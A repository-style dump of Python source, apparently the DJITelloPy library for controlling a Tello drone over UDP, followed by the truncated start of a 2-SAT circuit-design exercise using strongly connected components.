[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 5
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
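    # Hedged illustration only (field names come from INT_STATE_FIELDS/FLOAT_STATE_FIELDS
    # above; the concrete values are made up): a raw state datagram looks roughly like
    #   "pitch:0;roll:0;yaw:0;vgx:0;vgy:0;vgz:0;templ:60;temph:62;tof:10;h:0;bat:87;"
    #   "baro:123.45;time:0;agx:0.00;agy:0.00;agz:-1000.00;"
    # and parse_state() converts it into a dict such as
    #   {'pitch': 0, ..., 'bat': 87, 'baro': 123.45, ...}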
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise TelloException('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
            int: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address)
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
            str: response text on success, or an error message string on failure.
"""
        # Commands sent in very quick succession can make the drone stop responding to them,
        # so wait at least self.TIME_BTW_COMMANDS seconds between commands.
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
        # Commands sent in very quick succession can make the drone stop responding, so callers should leave at least self.TIME_BTW_COMMANDS seconds between commands.
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if 'ok' in response.lower():
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
        Parses the response to a float
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise TelloException("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise TelloException('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
self.is_flying = True
def takeoff(self):
"""Automatic takeoff.
"""
        # Sometimes it takes quite a long time for the drone to take off and report a successful takeoff,
        # so we wait longer here. Otherwise, the following calls would return an error.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
        Video streaming is supported on all Tellos when in AP mode (i.e.
        when your computer is connected to a Tello-XXXXXX WiFi network).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_command_without_return("emergency")
self.is_flying = False
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
            x: 1-360
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
try:
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
except TelloException:
pass
if self.background_frame_read is not None:
self.background_frame_read.stop()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames using PyAV in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
self.address = address
self.frame = np.zeros([300, 400, 3], dtype=np.uint8)
# Try grabbing frame with PyAV
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
try:
Tello.LOGGER.debug('trying to grab video frames...')
self.container = av.open(self.address, timeout=(Tello.FRAME_GRAB_TIMEOUT, None))
except av.error.ExitError:
raise TelloException('Failed to grab video frames from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames using PyAV
Internal method, you normally wouldn't call this yourself.
"""
try:
for frame in self.container.decode(video=0):
self.frame = np.array(frame.to_image())
if self.stopped:
self.container.close()
break
except av.error.ExitError:
raise TelloException('Do not have enough frames for decoding, please try again or increase video fps before get_frame_read()')
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
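# Hedged usage sketch, not part of the library itself: a minimal flight that only uses
# methods defined above. It assumes a powered-on Tello and that this machine is joined
# to the drone's Tello-XXXXXX WiFi network; it runs only when the module is executed
# directly.
if __name__ == "__main__":
    drone = Tello()
    drone.connect()             # enter SDK mode and wait for the first state packet
    Tello.LOGGER.info("Battery: {}%".format(drone.get_battery()))
    drone.takeoff()
    drone.move_up(50)           # climb 50 cm (valid range 20-500)
    drone.rotate_clockwise(90)  # quarter turn clockwise
    drone.land()
    drone.end()                 # land/stop streaming if needed and deregister the drone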
|
circuit_design.py
|
# python3
# n, m = map(int, input().split())
# clauses = [ list(map(int, input().split())) for i in range(m) ]
# # This solution tries all possible 2^n variable assignments.
# # It is too slow to pass the problem.
# # Implement a more efficient algorithm here.
# def isSatisfiable():
# for mask in range(1<<n):
# result = [ (mask >> i) & 1 for i in range(n) ]
# formulaIsSatisfied = True
# for clause in clauses:
# clauseIsSatisfied = False
# if result[abs(clause[0]) - 1] == (clause[0] < 0):
# clauseIsSatisfied = True
# if result[abs(clause[1]) - 1] == (clause[1] < 0):
# clauseIsSatisfied = True
# if not clauseIsSatisfied:
# formulaIsSatisfied = False
# break
# if formulaIsSatisfied:
# return result
# return None
# result = isSatisfiable()
# if result is None:
# print("UNSATISFIABLE")
# else:
# print("SATISFIABLE");
# print(" ".join(str(-i-1 if result[i] else i+1) for i in range(n)))
import sys
import threading
import collections.abc
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**26) # new thread will get stack of such size
import itertools
def conn_comp(edges):
vertices = set(v for v in itertools.chain(*edges))
indices = dict((v, -1) for v in vertices)
lowlinks = indices.copy()
ccs = []
index = 0
stack = []
for v in vertices:
        if indices[v] < 0:
            index = strong_connect(v, edges, indices, lowlinks, ccs, index, stack)
return ccs
def strong_connect(vertex, edges, indices, lowlinks, ccs, index, stack):
indices[vertex] = index
lowlinks[vertex] = index
index += 1
stack.append(vertex)
for v, w in [e for e in edges if e[0] == vertex]:
        if indices[w] < 0:
            index = strong_connect(w, edges, indices, lowlinks, ccs, index, stack)
lowlinks[v] = min(lowlinks[v], lowlinks[w])
elif w in stack:
lowlinks[v] = min(lowlinks[v], indices[w])
    if indices[vertex] == lowlinks[vertex]:
        ccs.append([])
        while stack[-1] != vertex:
            ccs[-1].append(stack.pop())
        ccs[-1].append(stack.pop())
    return index
class Ordered_Set(collections.abc.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
current = end[1]
current[2] = end[1] = self.map[key] = [key, current, end]
def discard(self, key):
if key in self.map:
key, prev, next = self.map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.end
current = end[2]
while current is not end:
yield current[0]
current = current[2]
def __reversed__(self):
end = self.end
current = end[1]
while current is not end:
yield current[0]
current = current[1]
def pop(self, last=True):
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, Ordered_Set):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)
def post_orders(adjacents):
vertices = set([node for node in range(len(adjacents))])
def dfs(node, order, traversed):
que = collections.deque([node])
while len(que) > 0:
node = que.pop()
traversed.add(node)
moving_up = True
to_add = []
for adj in adjacents[node]:
if adj in traversed:
continue
moving_up = False
to_add.append(adj)
if moving_up:
order.add(node)
if node in vertices:
vertices.remove(node)
else:
que.append(node)
for n in to_add:
que.append(n)
post_order = Ordered_Set([])
traversed = set([])
vertices = set([node for node in range(len(adjacents))])
while True:
dfs(vertices.pop(), post_order, traversed)
if len(post_order) == len(adjacents):
break
assert len(post_order) == len(adjacents)
return list(post_order)
def post_orders_ss(adjacents):
def dfs(node, order, traversed):
traversed.add(node)
for adj in adjacents[node]:
if adj in traversed:
continue
dfs(adj, order, traversed)
if node in vertices:
vertices.remove(node)
order.add(node)
post_order = Ordered_Set([])
traversed = set([])
vertices = set([node for node in range(len(adjacents))])
while True:
dfs(vertices.pop(), post_order, traversed)
if len(post_order) == len(adjacents):
break
assert len(post_order) == len(adjacents)
return list(post_order)
def connected_component_(adjacents, node, found):
connected = set([])
def dfs(node, connected):
connected.add(node)
        found.add(node)
for adj in adjacents[node]:
if adj in found or adj in connected:
continue
dfs(adj, connected)
dfs(node, connected)
return connected
def connected_component(adjacents, node, found):
connected = set([])
que = collections.deque([node])
while len(que) > 0:
node = que.pop()
if node in connected:
continue
connected.add(node)
found.add(node)
for adj in adjacents[node]:
if adj in found or adj in connected:
continue
que.append(adj)
return connected
def analyse_connected_components_(n, adjacents, reverse, var_map):
order = post_orders_ss(reverse)
order_pointer = len(order) - 1
found = set([])
ccs = []
while order_pointer >= 0:
if order[order_pointer] in found:
order_pointer -= 1
continue
ccs.append(connected_component_(adjacents, order[order_pointer], found))
assert len(found) == len(adjacents), 'found {0} nodes, but {1} were specified'.format(len(found), n)
return ccs
def analyse_connected_components(n, adjacents, reverse):
order = post_orders_ss(reverse)
order_pointer = len(order) - 1
found = set([])
ccs = []
while order_pointer >= 0:
if order[order_pointer] in found:
order_pointer -= 1
continue
ccs.append(connected_component(adjacents, order[order_pointer], found))
assert len(found) == len(adjacents), 'found {0} nodes, but {1} were specified'.format(len(found), n)
return ccs
def build_implication_graph(n, clauses):
edges = []
var_dict = {}
node_dict = {}
node_num = 0
adjacents = [[] for _ in range(2*n)]
